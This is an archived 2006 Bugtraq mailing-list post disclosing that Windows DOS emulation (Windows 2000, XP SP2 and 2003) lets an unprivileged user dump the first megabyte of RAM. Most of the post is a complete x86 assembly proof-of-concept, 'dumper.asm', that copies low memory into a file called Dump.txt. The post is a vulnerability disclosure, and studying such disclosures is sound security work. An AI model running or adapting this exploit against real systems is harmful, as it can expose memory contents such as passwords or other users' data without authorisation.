lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1802.195.68.104.22.1138104113.squirrel@mail.pulltheplug.org>
Date: Tue, 24 Jan 2006 04:01:53 -0800 (PST)
From: endrazine@...ltheplug.org
To: bugtraq@...urityfocus.com
Subject: Windows mem leakage


Desc : Windows Dos emulation allows dumping of first 1 Mo of RAM (with no
particular privilege).

Tested under : Win 2000, XP SP2, 2003

Code :

;---------------- [ dumper.asm ]-----------------------------------------
; Dump first 1 Mo of memory under any MS product
; 1 Mo is the maximum quantity of accessible memory
; in real mode using 16b OSes.
;
; endrazine, last update : 30/12/2005
;
;-------------------------------------------------------------------------

code segment
        org 100h
        assume ds:code, es:code, cs:code


        xor ax,ax
        mov si,ax

start:
        mov ah, 09h
        mov dx,offset welcome
        int 21h

        xor ax,ax              ;Wait until key pressed
        int 16h


        mov ah, 3ch                 ; MS DOS Create file Function
        mov dx, offset fname
        xor cx,cx
        int 21h


        mov ax, 3d01h               ; MS DOS Open file Function
        int 21h
        mov handle,ax


        xor ax,ax
        mov ds,ax
        mov myds,ds
        mov cx,32

dabigloop:
        push cx

        xor ax,ax
        mov si,ax

        ;==destination==
        mov di,offset buffer
        mov es,cs

        ;==compteur==
        mov cx,16384

        ;==copy==
        rep movsw

        mov ds,cs

        xor ax,ax
        mov ah, 40h
        mov bx,handle
        mov cx,32768; +10
        mov dx, offset buffer
        int 21h

        mov ax,myds
;add ax,2047 ;repeat last 16b
        add ax,2048
        mov myds,ax
        mov ds,ax

        pop cx

        loop dabigloop

        mov ax,4ch                  ; Quit
        int 21h


myds dw ?
handle dw ?
welcome db '[ Raw Dos Memory Dumper ]',10,13
        db '',10,13
        db '[ coded by endrazine ]',10,13
        db '',10,13
        db '[ Dumping First Memory chunk to Dump.txt ]',10,13
        db 'Press any key$',10,13
fname db 'Dump.txt',0
buffer db 32768 dup ?
some_canari_separator db '//////////',0
end start

end


;------------------------------------------------------------------------



Endrazine-



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ